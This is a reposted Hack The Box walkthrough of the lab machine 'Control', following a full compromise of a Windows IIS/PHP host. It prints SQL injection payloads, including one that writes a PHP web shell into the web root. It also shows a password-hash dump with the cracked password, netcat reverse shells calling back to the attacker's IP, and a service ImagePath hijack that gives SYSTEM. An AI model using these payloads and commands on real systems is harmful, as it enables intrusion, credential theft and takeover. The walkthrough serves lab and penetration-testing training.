Control: Hack The Box Walkthrough
source link: https://hackso.me/control-htb-walkthrough/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
This post documents the complete walkthrough of Control, a retired vulnerable VM created by TRX , and hosted at Hack The Box . If you are uncomfortable with spoilers, please stop reading now.
On this post
- Information Gathering
- Admin Interface Bypass
- Taking baby steps to discover SQL Injection
-
- Run as LocalSystem with no dependencies
- Hector is able to start the service
Background
Control is a retired vulnerable VM from Hack The Box.
Information Gathering
Let's start with a masscan
probe to establish the open ports in the host.
# masscan -e tun1 -p1-65535,U:1-65535 10.10.10.167 --rate=500 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2019-11-25 07:40:50 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 135/tcp on 10.10.10.167 Discovered open port 49667/tcp on 10.10.10.167 Discovered open port 49666/tcp on 10.10.10.167 Discovered open port 3306/tcp on 10.10.10.167 Discovered open port 80/tcp on 10.10.10.167
Nothing unusual. Let’s do one better with nmap
scanning the discovered ports to establish their services.
# nmap -n -v -Pn -p80,135,3306 -A --reason -oN nmap.txt 10.10.10.167 ... PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Fidelity 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 3306/tcp open mysql? syn-ack ttl 127 | fingerprint-strings: | FourOhFourRequest, GetRequest, LDAPSearchReq, LPDString, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SSLSessionReq, TLSSessionReq, TerminalServerCookie, WMSRequest, afp, giop, ms-sql-s: |_ Host '10.10.15.82' is not allowed to connect to this MariaDB server 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port3306-TCP:V=7.80%I=7%D=11/25%Time=5DDB86B6%P=x86_64-pc-linux-gnu%r(G SF:etRequest,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x SF:20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(RTSPR SF:equest,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20a SF:llowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(RPCCheck SF:,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allowed SF:\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(SSLSessionReq, SF:4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allowed\ SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(TerminalServerC SF:ookie,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20al SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(TLSSessio SF:nReq,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20all SF:owed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(FourOhFour SF:Request,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20 SF:allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LPDStri SF:ng,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allow SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LDAPSearchRe SF:q,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allowe SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(SIPOptions,4A SF:,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allowed\x2 SF:0to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(NotesRPC,4A,"F\0\ SF:0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allowed\x20to\x2 SF:0connect\x20to\x20this\x20MariaDB\x20server")%r(WMSRequest,4A,"F\0\0\x0 SF:1\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allowed\x20to\x20con SF:nect\x20to\x20this\x20MariaDB\x20server")%r(ms-sql-s,4A,"F\0\0\x01\xffj SF:\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allowed\x20to\x20connect\x SF:20to\x20this\x20MariaDB\x20server")%r(afp,4A,"F\0\0\x01\xffj\x04Host\x2 SF:0'10\.10\.15\.82'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20thi SF:s\x20MariaDB\x20server")%r(giop,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\. SF:15\.82'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Maria SF:DB\x20server");
I’m pretty sure there’s a MySQL database service behind 3306/tcp
.
That leaves us with the http
service. This is how it looks like.
Oh, before I forget, the IIS is running PHP as well.
Admin Interface Bypass
There’s something interesting in the HTML source of index.php
.
I’ve checked. /myfiles
doesn’t exist. And also there’s this interesting message when I try to access admin.php
.
I put two and two together, and made an educated guess. This is the client IP address that’s allowed to access admin.php
, usually through X-Forwarded-For
type of header. To facilitate that, we can make use of Burp’s Bypass WAF extension.
Set the scope to the remote machine and we are good to go.
Presto!
Taking baby steps to discover SQL Injection
It’s not long before I discovered a classic vulnerability with a single quote ( '
) entered into the search field: SQL injection within the search_products.php
page.
Usually, we have to determine the number of columns from the products
table but looking at above, the number of columns should be five or six. Let’s enter the following into the search field.
' ORDER BY 7 -- -
Confirmed. The number of columns is six. Let’s enter the following into the search field.
' UNION SELECT 1,2,3,4,5,@@VERSION -- -
So, the search_products.php
page is susceptible to a UNION-based SQL injection. Time to upload a simple PHP backdoor like so.
<?php echo shell_exec($_GET[0]); ?>
Enter the following into the search field.
' UNION SELECT 1,2,3,4,5,"<br><pre><?php echo htmlentities(shell_exec($_GET[0])); ?></pre>" INTO OUTFILE '\\inetpub\\wwwroot\\cmd.php' -- -
Let’s see if we can execute remote commands through PHP.
Awesome!
Low-Privilege Shell
Time to get that shell. First, let’s transfer nc.exe
(from /usr/share/windows-resources/binaries/nc.exe
) to a world-writable folder (like \Windows\System32\spool\drivers\color
).
On one hand let’s run the reverse shell back to us while nc
listens for the incoming shell on the other hand.
And we have the initial foothold.
Hector is in the Remote Management Users group
During enumeration of iusr
’s account, I noticed that Hector is in the Remote Management Users group. That means his credentials must be lying somewhere…
Get that hash
To be honest, I was pleasantly surprised that I could even run the following SQLi and yielded something.
' UNION SELECT 1,2,3,4,user, password from mysql.user -- -
What do we have here? Hector’s password hash!
John the Ripper
Armed with Hector’s password hash, let’s show John the Ripper some .
Hector’s password is l33th4x0rhector
.
PowerShell Remoting / WinRM
Now that we have Hector’s password, we can proceed to log in to Hector’s account via PowerShell Remoting. But first, we need to spawn a PowerShell. To do that, we can use nc.exe
to spawn another reverse shell and enter into PowerShell from there.
The hostname is Fidelity by the way. That’s the only plot twist.
With that, we can execute Start-Process to call upon our nc.exe
to run the third reverse shell. This time as Hector.
> Start-Process -FilePath \windows\system32\spool\drivers\color\cute.exe -ArgumentList "10.10.15.82 4444 -e cmd" -NoNewWindow
Getting user.txt
The file user.txt
is at Hector’s Desktop. No surprise there.
Privilege Escalation
During enumeration of Hector’s account, I notice that Hector is able to do something special with one of the Registry keys.
I generated the above with AccessChk from Microsoft SysInternals like so.
> accesschk.exe -klr hklm\system\currentcontrolset
That means that Hector is able to change the ImagePath
of any service of my choice, but which one? The service must be in a stopped state, run as LocalSystem with no dependencies and more importantly, Hector must have the permissions to start the service.
Long story short, I chose Secondary Logon service or seclogon
. Here’s why.
Stopped state
Run as LocalSystem with no dependencies
Hector is able to start the service
Basically, the security descriptor string says that Hector as an Authenticated User has the Read Property (RP) of the service object, i.e. Hector can start the Secondary Logon service.
Getting root.txt
To change the ImagePath
of the seclogon
service, we can use the very versatile REG.EXE
command.
> REG DELETE HKLM\SYSTEM\CURRENTCONTROLSET\Services\seclogon /v ImagePath /f > REG ADD HKLM\SYSTEM\CURRENTCONTROLSET\Services\seclogon /v ImagePath /t REG_SZ /d "%WINDIR%\System32\cmd.exe /c start %WINDIR%\system32\spool\drivers\color\cute.exe 10.10.15.82 5555 -e cmd.exe" /f > sc start seclogon
Time to claim the prize…
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK